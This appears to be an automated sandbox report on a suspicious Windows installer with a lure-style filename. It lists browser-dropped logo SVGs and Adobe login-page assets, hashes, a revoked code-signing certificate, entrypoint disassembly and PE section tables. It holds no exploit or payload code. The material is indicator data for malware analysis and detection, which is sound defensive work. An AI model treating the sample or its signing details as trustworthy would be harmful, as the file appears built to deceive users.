                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 21 21"><title>MS-SymbolLockup</title><rect x="1" y="1" width="9" height="9" fill="#f25022"/><rect x="1" y="11" width="9" height="9" fill="#00a4ef"/><rect x="11" y="1" width="9" height="9" fill="#7fba00"/><rect x="11" y="11" width="9" height="9" fill="#ffb900"/></svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1288
                                                                                                      Entropy (8bit):5.003353448492329
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2dkLxsN6g4R+p6Epwta0J5vDwNK6nCHxhfJPmggvn/H0SSHmDFR3l4:csxK2WDaJ+whHhmggv/UUR36
                                                                                                      MD5:22C0F5D1D9486E8AECC35634DE0EBC51
                                                                                                      SHA1:81638BFBDCD5C1391F993041E23CE2EC55407774
                                                                                                      SHA-256:BFE117A5846194E309FEB56EA18137CBF5C8080B5D5DB2FC4ECA8E3B3B09C617
                                                                                                      SHA-512:F79D173467CE83525FB6504E337B82CB6BB8E845F48ADDA0D1ACB68033C95BFC7BF93198BA2883DE997299756AEF7CB0F5899907B865986E938B63CDE5606EF7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 25 25">. <defs>. <style>. .cls-1 {. clip-path: url(#clippath);. }.. .cls-2 {. fill: none;. }.. .cls-2, .cls-3, .cls-4, .cls-5 {. stroke-width: 0px;. }.. .cls-6 {. mask: url(#mask);. }.. .cls-4 {. fill: #fee500;. }.. .cls-5 {. fill: #fff;. }. </style>. <clipPath id="clippath">. <rect class="cls-2" x="6.5" y="7.5" width="12" height="10"/>. </clipPath>. <mask id="mask" x="-37.14" y="-31.7" width="101.41" height="64.6" maskUnits="userSpaceOnUse">. <g id="mask0_523_4559" data-name="mask0 523 4559">. <path class="cls-5" d="m-37.14-31.7h101.41V32.9H-37.14V-31.7Z"/>. </g>. </mask>. </defs>. <rect class="cls-4" x="0" y="0" width="25" height="25" rx="12.5" ry="12.5"/>. <g class="cls-1">.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):344
                                                                                                      Entropy (8bit):4.7966070819921685
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:tI9mc4slzblftlGrUQtaKu4RnKSinpK/Ve9xXnpKlptMiSinpKFAmtMlxXnpK9L:t4NlfPGrUm6nAgXnAlVnAFABXnAt
                                                                                                      MD5:24E5106CCB2BAD68CBFD17822AB66C7C
                                                                                                      SHA1:96D0AE096B74550DEEC5DD54C6B98C9C6E3FA43F
                                                                                                      SHA-256:0703A621353241F2233FEDC6CD1B1231EAFD3FB611E1A5DE33AAD00A06111ADC
                                                                                                      SHA-512:EAE68A31B71C8FC855E9809FF7AF92310AE0FAD227780BBCE50C694962D2DA9A7A62AC9F3E3E1ABA85B06ADF31E9DD3585B379FDE327AB013DF075E452543A76
                                                                                                      Malicious:false
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 21 21"><title>MS-SymbolLockup</title><rect x="1" y="1" width="9" height="9" fill="#f25022"/><rect x="1" y="11" width="9" height="9" fill="#00a4ef"/><rect x="11" y="1" width="9" height="9" fill="#7fba00"/><rect x="11" y="11" width="9" height="9" fill="#ffb900"/></svg>.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1241
                                                                                                      Entropy (8bit):4.649162120071889
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t8SYcRjJhx/jywbPB3rQUrdSo/gdfmEcKJaan+x8J1DYW+u8wjI:5VjhjywbNrQUBSoIdfrTJY8J1DYW+u8f
                                                                                                      MD5:F3D8620B91A594708B45B74945D91C5C
                                                                                                      SHA1:5D8A283E9E07ADE59AE6A6C2358FEB8DABB82C76
                                                                                                      SHA-256:C7AB8D6C9467379D20F162C6F04FE508C6411D2799E59852E59CDB89CDDE2966
                                                                                                      SHA-512:3B5D029730C9AECE4A47D1DDD2364EEE1E4AE5421F710A38B078C02FCD1B486799CD0D84EEB2C8581B6A77F1F682EAB9592FEF5BB32057D22574B9E0332888FB
                                                                                                      Malicious:false
                                                                                                      URL:https://auth.services.adobe.com/img/social/sml-apple-logo.svg
                                                                                                      Preview:<svg id="Group_155509" data-name="Group 155509" xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50">. <rect id="Background" width="50" height="50" rx="25"/>. <g id="Group_74582" data-name="Group 74582" transform="translate(14.5 10.502)">. <path id="Apple_logo_black" d="M37.33,23.428a13.555,13.555,0,0,1-1.34,2.41,12.244,12.244,0,0,1-1.727,2.087,3.349,3.349,0,0,1-2.219.977,5.562,5.562,0,0,1-2.05-.489,5.882,5.882,0,0,0-2.207-.488,6.081,6.081,0,0,0-2.269.488,6.106,6.106,0,0,1-1.961.516,3.154,3.154,0,0,1-2.269-1,12.857,12.857,0,0,1-1.806-2.161,14.943,14.943,0,0,1-1.91-3.793,13.89,13.89,0,0,1-.8-4.521,8.256,8.256,0,0,1,1.084-4.319,6.36,6.36,0,0,1,2.271-2.3,6.108,6.108,0,0,1,3.07-.866,7.228,7.228,0,0,1,2.374.553,7.633,7.633,0,0,0,1.883.554,11.269,11.269,0,0,0,2.088-.652,6.9,6.9,0,0,1,2.839-.5A6.027,6.027,0,0,1,37.1,12.4a5.252,5.252,0,0,0-2.785,4.771,5.263,5.263,0,0,0,1.728,3.966,5.679,5.679,0,0,0,1.727,1.133q-.208.6-.44,1.156ZM32.519,4.5a5.319,5.319,0,0,1-1.363,
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1923
                                                                                                      Entropy (8bit):4.58221937716664
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cyjp5JKonwXuczIo9Io9Iq23IMCQl7/jYIBQZQUPH:3LJ031919k9f7jrBQxv
                                                                                                      MD5:DD9BE0188FAD7B70E52624E7359F1C28
                                                                                                      SHA1:6C1458F73FEE69BCED6CA621FBF0FE7C100E1B42
                                                                                                      SHA-256:21356A5723CD98BD26A7A7D9A5A2A97529C622BFF44E53793EE7D2DF95438CD8
                                                                                                      SHA-512:228F1840617F0EC19ED65F6A9300630BFD0D0CA71657C0A3FB707949A2F98E4D440B8F82C397CC538BB6A9E7C35C7AB88C5FE8D9487022A24512B93C6F95E8F1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="LINE_LOGO" data-name="LINE LOGO" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">. <defs>. <style>. .cls-1 {. fill: #4cc764;. }.. .cls-1, .cls-2 {. stroke-width: 0px;. }.. .cls-2 {. fill: #fff;. }. </style>. </defs>. <circle class="cls-1" cx="25" cy="25" r="25"/>. <g>. <path class="cls-2" d="m41.67,23.54c0-7.47-7.49-13.54-16.69-13.54s-16.69,6.08-16.69,13.54c0,6.7,5.94,12.3,13.96,13.36.54.12,1.28.36,1.47.82.17.42.11,1.08.05,1.51,0,0-.2,1.18-.24,1.43-.07.42-.34,1.65,1.45.9,1.78-.75,9.61-5.66,13.11-9.69h0c2.42-2.65,3.58-5.34,3.58-8.33Z"/>. <g>. <path class="cls-1" d="m36.12,27.86c.18,0,.32-.14.32-.32v-1.18c0-.18-.14-.32-.32-.32h-3.19v-1.23h3.19c.18,0,.32-.14.32-.32v-1.18c0-.18-.14-.32-.32-.32h-3.19v-1.23h3.19c.18,0,.32-.14.32-.32v-1.18c0-.18-.14-.32-.32-.32h-4.69c-.18,0-.32.14-.32.32h0v7.28h0c0,.18.14.32.32.32h4.69Z"/>. <path class="cls-1" d="m18.78,27.86c.18
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Web Open Font Format (Version 2), CFF, length 29752, version 1.0
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):29752
                                                                                                      Entropy (8bit):7.991259791890674
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:2eV5XX2zIpJY49uOFnjbPdch4XsBocL8S5n9nLZVzBL21uT0mMiQd7TJeAJWAa4:jvfY4uOJJsicL8SrL3zBL70mNA
                                                                                                      MD5:B45F7B0B58EA5CD543323A5E4BA4724B
                                                                                                      SHA1:03E815A2FA7461F31FC8ECC18A7063930FC87475
                                                                                                      SHA-256:9ABA873D54C84D8D56CFE572AB802BB34322DE6FD945C286D278FABE29A9F3F0
                                                                                                      SHA-512:0726643B1B961B3A2E67380A6CED69030E5E97E99C938EBA29830638CC0CA7CF0C42E22DFC6AC77553B21B4E71FF8E3C6BDB8004168449C182A88C9A380D3422
                                                                                                      Malicious:false
                                                                                                      URL:https://use.typekit.net/af/40207f/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3
                                                                                                      Preview:wOF2OTTO..t8..........s..........................F...]?DYNA.i?GDYN.y..r.`..N...6.$..H....7. ............y..h.0....UUU.&.w... .._..w..._..........s..;.L.xJ.%..4w....{I>le-.pU....[Y.B......_v.....a|.%8Jj"4...I..O.O..d}.A.8P......a.f..S.Oh[...{w....M"...[.,`.B2...`.K=Ql.S...&;....M.C...Z*)..P..S..[;........7.K....h...%..jIC....-.N...n....P....%9.Le.....pT..Z..vk..........:..hvP.Q..h;.....i^__.N.@9.O...G...d...i.D_.6...3..<c..Hw.=...m.. .i...:..m0.H....\......<........4... ..'"<qQ....C.S..A.J.,2.... .2_.....s......[......|.@.6);.O....w6.&[x..7.z.|....if..XDE..].Mp.).I.i.'..H....PW..[c..oUOe...5....^.sJB.(^b.... fL.[..>.J.4.y.....0{QN...4.....E..Qdf....5b....d,.3.^.Z.UD.!..y.....i77.$.S........F.2.8.:.h....az.........:....`x........S_. ..$.q{J..Z2..iWqG`[f.M...p&...3..w....{......:h.....i.qg.%...x...a(...0...2...>...^.w..\.w..e.....]..S;..b..d....+...ld..w....r.k.1QJ...y.a_..\+.g^Vp....v.3[r..+...B>$w....}....u...+8...x..U..6..1Ln!zS..w..h
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (2258)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):17008
                                                                                                      Entropy (8bit):5.5502271222360395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:cx2hpIgIVsUGiRm4lIeU4iDFeFs2NdFJsQF+i:cR7GiRm4X0JqsG7Ui
                                                                                                      MD5:A10396392AF7006E81573A789F8F0367
                                                                                                      SHA1:187F5E45A312D581FE4248DFF447F6DC4DDB208D
                                                                                                      SHA-256:92C86130DAF66FC1BCEF9A45A15608ABE448740ABDC3BCA1EEE9301767DDAF8B
                                                                                                      SHA-512:092900888FD08AE5B5458E91F92880EF10D909BA9F4656FB8DD80B9A4E24760213D5CB02E5BD6849360797FDD1D0D85E71BF4A6C868A40C9110EF3F7765300EA
                                                                                                      Malicious:false
                                                                                                      URL:https://use.typekit.net/ecr2zvs.js
                                                                                                      Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. *. * . 2009-2024 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1164490","c":[".tk-adobe-clean","\"adobe-clean\",sans-serif"],"fi":[7180,7182,7184],"fc":[{"id":7180,"family":"adobe-clean","src":"https://use.typekit.net/af/cb695f/000000000000000000017701/27/{format}{?primer,subset_id,fvd,v}","descriptors":{"weight":"400","style":"normal","stretch":"normal","display":"auto","variable":false,"subset_id":2}},{"id":7182,"family":"adobe-clean","src":"https://use.typekit.net/af/eaf09c/0000000
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1797
                                                                                                      Entropy (8bit):4.631584269642909
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2d/E1mN9OBEdJKpTzvkbxmDyeX9MUS6ifS4vrZm/e+It92k5jf7d1jSJXKkcn0E:c/UWJKMpeiUTCmG+I335jzDjSJ6kbE
                                                                                                      MD5:F639F757A2B5B00E98F3F1EA31404C1E
                                                                                                      SHA1:C625262F64F47B4D92B4A61CBC509671941DC9EA
                                                                                                      SHA-256:AE1F7BC6026339F4355FC367C8F13F971CB3E06E528321663F8A41B53587D9CE
                                                                                                      SHA-512:F66758828FC5ED03CB8D7C4A80E013C2D1978D3AF625AE4203BF4CB043D4DA38F3CEDBB9EB3BC514936B25B8DD62C665F13030B8D0CD3192F969F161C269F3E6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg id="Layer_2" data-name="Layer 2" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 28 28">. <defs>. <style>. .cls-1 {. fill: #06c755;. }.. .cls-1, .cls-2 {. stroke-width: 0px;. }.. .cls-2 {. fill: #fff;. }. </style>. </defs>. <g id="LINE_LOGO" data-name="LINE LOGO">. <g>. <rect class="cls-1" x="6" y="6" width="16" height="16" rx="3.61" ry="3.61"/>. <g>. <path class="cls-2" d="m19.33,13.25c0-2.39-2.39-4.33-5.33-4.33s-5.33,1.94-5.33,4.33c0,2.14,1.9,3.93,4.46,4.27.17.04.41.11.47.26.05.13.03.35.02.48,0,0-.06.38-.08.46-.02.13-.11.53.46.29.57-.24,3.07-1.81,4.19-3.1h0c.77-.85,1.14-1.71,1.14-2.66h0Z"/>. <g>. <path class="cls-1" d="m17.56,14.62h-1.5c-.06,0-.1-.05-.1-.1h0v-2.33h0c0-.06.05-.1.1-.1h1.5c.06,0,.1.05.1.1v.38c0,.06-.05.1-.1.1h-1.02v.39h1.02c.06,0,.1.05.1.1v.38c0,.06-.05.1-.1.1h-1.02v.39h1.02c.06,0,.1.05.1.1v.38c0,.06-.05.1-.1.1h0Z"/>. <path
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1400
                                                                                                      Entropy (8bit):5.2053804842426485
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tsWIKcfjJhKjY5AV8LVM3xjMAQilUK4clMMAk2iIlXQLxGMA9boilT7OQw/acW/E:fIhjVKVUYpQvK47PBOm9cs3wSTW8m
                                                                                                      MD5:E3A1F922468504DD26B5BEB3FEB94C58
                                                                                                      SHA1:52EA51104CD2720EBE6282BD15CAFCFE92F83C57
                                                                                                      SHA-256:9F27DFEE04F2DD28B95E41E3D416FC4C26BCA076591FC15CF24AB5646F966599
                                                                                                      SHA-512:DF01B8E262C955823E5D99C28EBE79386175FF240C6A862A9961B851E7C2EC8C5931495F426D95FE031EEBA315FCD36E940A86A8A4E67301B288232927CAE69D
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="Button_-_Google" data-name="Button - Google" xmlns="http://www.w3.org/2000/svg" width="50" height="50". viewBox="0 0 50 50">. <rect id="Background" width="50" height="50" rx="25" fill="#fff"/>. <g id="Group_69890" data-name="Group 69890" transform="translate(13 10.771)">. <g id="logo_googleg_48dp" transform="translate(0 2.228)">. <path id="Shape" d="M20.52,9.818A13.788,13.788,0,0,0,20.3,7.364H9v4.642h6.458a5.52,5.52,0,0,1-2.395,3.622v3.011h3.878a11.7,11.7,0,0,0,3.578-8.82Z" transform="translate(3 2.455)" fill="#4285f4" fill-rule="evenodd"/>. <path id="Shape-2" data-name="Shape" d="M11.681,20.43a11.456,11.456,0,0,0,7.942-2.907l-3.878-3.011a7.24,7.24,0,0,1-10.778-3.8H.957v3.109A12,12,0,0,0,11.681,20.43Z" transform="translate(0.319 3.57)" fill="#34a853" fill-rule="evenodd"/>. <path id="Shape-3" data-name="Shape" d="M5.285,12.627a7.094,7.094,0,0,1,0-4.56V4.958H1.276a12.015,12.015,0,0,0,0,10.778l4.009-3.109Z" transform="translate(0 1.653)" fill="#fbbc05" fil
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.993907634477875
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      File name:Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
                                                                                                      File size:321'527'232 bytes
                                                                                                      MD5:988955bfa46336be7eb44f11f5427699
                                                                                                      SHA1:86f277c2e39af1a01575c30f601c4c411297c78e
                                                                                                      SHA256:1c01b0f68306375e4cc9209e2bbb94965fbb943b75946a390a53fd05bb9b3c16
                                                                                                      SHA512:5b1197c9359c7e4ac0b64b828b47117310deb7c8a22d4e21f675d20826db18707abab870308af5df1fd2bf30776cd8c159d0bb4c2dfaf7b55e7e409b7df6ad83
                                                                                                      SSDEEP:196608:jxq37itqtgE0DWAjzkUz4fs8d3gpnwu3KbPZmHt+kFzO7/:dptqf5+z6s+7/oHtN+
                                                                                                      TLSH:A4E8F2AF5BFA13A2911DDDF74C4C770C0E41BBF0E03B55281A5299EA846F6691C312AF
                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                      Icon Hash:74f4e4dce4f2e4e4
                                                                                                      Entrypoint:0x4b5eec
                                                                                                      Entrypoint Section:.itext
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:1
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:1
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:1
                                                                                                      Import Hash:e569e6f445d32ba23766ad67d1e3787f
                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                      Signature Validation Error:A certificate was explicitly revoked by its issuer
                                                                                                      Error Number:-2146762484
                                                                                                      Not Before, Not After
                                                                                                      • 30/08/2023 16:48:33 29/08/2024 16:48:33
                                                                                                      Subject Chain
                                                                                                      • OID.1.3.6.1.4.1.311.60.2.1.3=UA, OID.2.5.4.15=Private Organization, CN="\u0422\u041e\u0412 ""\u0411\u043b\u0443 \u0421\u0435\u0438\u0306\u043b \u041a\u043e\u043c\u043e\u0434\u0456\u0442\u0456""", SERIALNUMBER=45224266, O="\u0422\u041e\u0412 ""\u0411\u043b\u0443 \u0421\u0435\u0438\u0306\u043b \u041a\u043e\u043c\u043e\u0434\u0456\u0442\u0456""", L=Kyiv, C=UA
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:E3879A408A72E758696236F0DE306403
                                                                                                      Thumbprint SHA-1:949F349032F495EC682A1D6A58D892ED9145A2ED
                                                                                                      Thumbprint SHA-256:77D7E2BFC769C1376E1F55398D0D08987C0FF3A08CF6897FCDC0932019D739C2
                                                                                                      Serial:27987C7E3C455F499B18AFD03B3CBBDF
                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      add esp, FFFFFFA4h
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      xor eax, eax
                                                                                                      mov dword ptr [ebp-3Ch], eax
                                                                                                      mov dword ptr [ebp-40h], eax
                                                                                                      mov dword ptr [ebp-5Ch], eax
                                                                                                      mov dword ptr [ebp-30h], eax
                                                                                                      mov dword ptr [ebp-38h], eax
                                                                                                      mov dword ptr [ebp-34h], eax
                                                                                                      mov dword ptr [ebp-2Ch], eax
                                                                                                      mov dword ptr [ebp-28h], eax
                                                                                                      mov dword ptr [ebp-14h], eax
                                                                                                      mov eax, 004B14B8h
                                                                                                      call 00007F2CA10C8BC5h
                                                                                                      xor eax, eax
                                                                                                      push ebp
                                                                                                      push 004B65E2h
                                                                                                      push dword ptr fs:[eax]
                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                      xor edx, edx
                                                                                                      push ebp
                                                                                                      push 004B659Eh
                                                                                                      push dword ptr fs:[edx]
                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                      mov eax, dword ptr [004BE634h]
                                                                                                      call 00007F2CA116B6B7h
                                                                                                      call 00007F2CA116B20Ah
                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                      xor eax, eax
                                                                                                      call 00007F2CA10DE664h
                                                                                                      mov edx, dword ptr [ebp-14h]
                                                                                                      mov eax, 004C1D84h
                                                                                                      call 00007F2CA10C37B7h
                                                                                                      push 00000002h
                                                                                                      push 00000000h
                                                                                                      push 00000001h
                                                                                                      mov ecx, dword ptr [004C1D84h]
                                                                                                      mov dl, 01h
                                                                                                      mov eax, dword ptr [004238ECh]
                                                                                                      call 00007F2CA10DF7E7h
                                                                                                      mov dword ptr [004C1D88h], eax
                                                                                                      xor edx, edx
                                                                                                      push ebp
                                                                                                      push 004B654Ah
                                                                                                      push dword ptr fs:[edx]
                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                      call 00007F2CA116B73Fh
                                                                                                      mov dword ptr [004C1D90h], eax
                                                                                                      mov eax, dword ptr [004C1D90h]
                                                                                                      cmp dword ptr [eax+0Ch], 01h
                                                                                                      jne 00007F2CA117195Ah
                                                                                                      mov eax, dword ptr [004C1D90h]
                                                                                                      mov edx, 00000028h
                                                                                                      call 00007F2CA10E00DCh
                                                                                                      mov edx, dword ptr [004C1D90h]
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xfdc.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000xe2d8.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1329f7600x2660
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc22f40x254.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xb39e40xb3a0043af0a9476ca224d8e8461f1e22c94daFalse0.34525867693110646data6.357635049994181IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .itext0xb50000x16880x1800185e04b9a1f554e31f7f848515dc890cFalse0.54443359375data5.971425428435973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .data0xb70000x37a40x3800cab2107c933b696aa5cf0cc6c3fd3980False0.36097935267857145data5.048648594372454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .bss0xbb0000x6de80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .idata0xc20000xfdc0x1000e7d1635e2624b124cfdce6c360ac21cdFalse0.3798828125data5.029087481102678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .didata0xc30000x1a40x2008ced971d8a7705c98b173e255d8c9aa7False0.345703125data2.7509822285969876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .edata0xc40000x9a0x2008d4e1e508031afe235bf121c80fd7d5fFalse0.2578125data1.877162954504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .tls0xc50000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rdata0xc60000x5d0x2008f2f090acd9622c88a6a852e72f94e96False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xc70000xe2d80xe400739e4a2ee14664b0b549d68dd1dc5fa1False0.3200212445175439data5.068492958484433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0xc75280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.45390070921985815
                                                                                                      RT_ICON0xc79900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.29098360655737704
                                                                                                      RT_ICON0xc83180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.20825515947467166
                                                                                                      RT_ICON0xc93c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.12468879668049793
                                                                                                      RT_ICON0xcb9680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.08573452999527634
                                                                                                      RT_ICON0xcfb900x2756PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9509433962264151
                                                                                                      RT_STRING0xd22e80x360data0.34375
                                                                                                      RT_STRING0xd26480x260data0.3256578947368421
                                                                                                      RT_STRING0xd28a80x45cdata0.4068100358422939
                                                                                                      RT_STRING0xd2d040x40cdata0.3754826254826255
                                                                                                      RT_STRING0xd31100x2d4data0.39226519337016574
                                                                                                      RT_STRING0xd33e40xb8data0.6467391304347826
                                                                                                      RT_STRING0xd349c0x9cdata0.6410256410256411
                                                                                                      RT_STRING0xd35380x374data0.4230769230769231
                                                                                                      RT_STRING0xd38ac0x398data0.3358695652173913
                                                                                                      RT_STRING0xd3c440x368data0.3795871559633027
                                                                                                      RT_STRING0xd3fac0x2a4data0.4275147928994083
                                                                                                      RT_RCDATA0xd42500x10data1.5
                                                                                                      RT_RCDATA0xd42600x2c4data0.6384180790960452
                                                                                                      RT_RCDATA0xd45240x2cdata1.1590909090909092
                                                                                                      RT_GROUP_ICON0xd45500x5adataEnglishUnited States0.8111111111111111
                                                                                                      RT_VERSION0xd45ac0x584dataEnglishUnited States0.273371104815864
                                                                                                      RT_MANIFEST0xd4b300x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                      DLLImport
